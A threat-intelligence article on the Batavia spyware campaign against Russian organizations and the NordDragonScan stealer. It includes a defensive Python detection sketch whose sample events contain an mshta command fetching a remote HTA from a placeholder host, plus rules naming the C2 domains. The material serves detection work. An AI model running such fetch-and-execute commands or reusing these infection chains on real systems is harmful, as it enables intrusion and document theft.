In a series of targeted cyberattacks that began in July 2024, Russian organizations have been infiltrated by a previously unidentified Windows spyware known as Batavia. Cybersecurity firm Kaspersky has been monitoring this campaign, which employs sophisticated phishing tactics to compromise systems and exfiltrate sensitive documents.
Initial Attack Vector: Phishing Emails
The attackers initiate their campaign by sending deceptive emails from the domain oblast-ru[.]com, which they control. These emails, crafted to appear as legitimate contract communications, contain malicious links leading to the download of an archive file. Within this archive resides a Visual Basic Encoded script (.VBE) file. When executed, this script profiles the victim’s system and transmits the gathered information to a remote server. Subsequently, the script downloads a Delphi-based executable, marking the next phase of the infection.
Malware Capabilities and Data Exfiltration
Once the Delphi executable is active, it likely presents a counterfeit contract document to the user, serving as a distraction while it operates covertly. In the background, the malware collects a variety of data, including system logs, office documents (such as .doc, .docx, .ods, .odt, .pdf, .xls, and .xlsx files), and screenshots. It also scans removable devices connected to the system for additional data.
The malware’s functionality extends further by downloading an additional binary from the attacker’s server. This new component broadens the scope of targeted file types to include images, emails, PowerPoint presentations, archive files, and text documents (specifically .jpeg, .jpg, .cdr, .csv, .eml, .ppt, .pptx, .odp, .rar, .zip, .rtf, and .txt files). The exfiltrated data is then transmitted to a different domain, ru-exchange[.]com, from which another executable is downloaded, indicating a multi-stage attack designed for prolonged espionage.
Scope and Impact
Kaspersky’s telemetry data reveals that over the past year, more than 100 users across several dozen organizations have received these phishing emails. The primary objective of the Batavia spyware is to steal internal documents and gather comprehensive system information, including lists of installed programs, drivers, and operating system components.
Broader Context: Similar Threats
This discovery aligns with other recent findings in the cybersecurity landscape. For instance, Fortinet FortiGuard Labs identified a campaign delivering a Windows stealer malware named NordDragonScan. While the exact method of initial infection remains unclear, it is believed to involve phishing emails containing links that lead to the download of a RAR archive. This archive includes a Windows shortcut (LNK) file that uses mshta.exe to execute a remotely hosted HTML Application (HTA). This process results in the display of a benign decoy document while a malicious .NET payload is silently installed.
Once installed, NordDragonScan connects to a remote server (kpuszkiev[.]com), establishes persistence through Windows Registry modifications, and conducts extensive reconnaissance of the compromised system. It collects sensitive data, including entire Chrome and Firefox profiles, documents, and screenshots, which are then exfiltrated back to the attacker’s server via an HTTP POST request.
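Both chains described above (a .VBE script launched from an extracted archive in the Batavia case, and mshta.exe pulling a remotely hosted HTA in the NordDragonScan case) leave footprints that endpoint telemetry can catch. The following is an added detection sketch, not code from Kaspersky, Fortinet, or this article; the event records it runs over are constructed samples, and the HTA host name in them is a placeholder, while the three domains are the ones the article names.

```python
"""Toy detection pass over constructed process-creation and DNS events."""
import re

# Domains named in the article (defanged there with [.]; re-fanged here for matching).
KNOWN_DOMAINS = {"oblast-ru.com", "ru-exchange.com", "kpuszkiev.com"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(Temp|Downloads|AppData)\\", re.IGNORECASE)

def evaluate_event(ev):
    """Return (rule, detail) tuples for one event dict; empty list if nothing fired."""
    hits = []
    if ev.get("type") == "process":
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd = ev.get("cmdline", "")
        # Batavia stage 1: a script host running a .vbe/.vbs out of a user-writable path
        if image in SCRIPT_HOSTS and re.search(r"\.vb[es]\b", cmd, re.I) and USER_WRITABLE.search(cmd):
            hits.append(("vbe_from_user_path", cmd))
        # NordDragonScan stage 1: mshta.exe handed an http(s) URL ending in .hta
        if image == "mshta.exe" and REMOTE_HTA.search(cmd):
            hits.append(("mshta_remote_hta", cmd))
    elif ev.get("type") == "dns":
        q = ev["query"].lower().rstrip(".")
        if q in KNOWN_DOMAINS or any(q.endswith("." + d) for d in KNOWN_DOMAINS):
            hits.append(("known_c2_domain", q))
    return hits

def evaluate(events):
    """Flatten per-event hits into (host, rule, detail) alerts."""
    return [(ev["host"], rule, detail) for ev in events for rule, detail in evaluate_event(ev)]

# Constructed sample telemetry; hta-host.invalid is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\ivan\AppData\Local\Temp\contract_2024.vbe"'},
    {"host": "ws01", "type": "dns", "query": "oblast-ru.com"},
    {"host": "ws02", "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://hta-host.invalid/decoy.hta"},
    {"host": "ws03", "type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Program Files\Vendor\install.vbs"'},  # benign install script
    {"host": "ws03", "type": "dns", "query": "update.microsoft.com"},
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

The subdomain check on DNS queries matters because exfiltration hosts are often prefixed (mail., api.) rather than queried as the bare registered domain.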
Conclusion
The emergence of Batavia and similar malware underscores the evolving sophistication of cyber threats targeting organizations. These campaigns highlight the critical need for robust cybersecurity measures, including employee education on phishing tactics, regular system monitoring, and the implementation of advanced threat detection solutions to mitigate the risk of such infiltrations.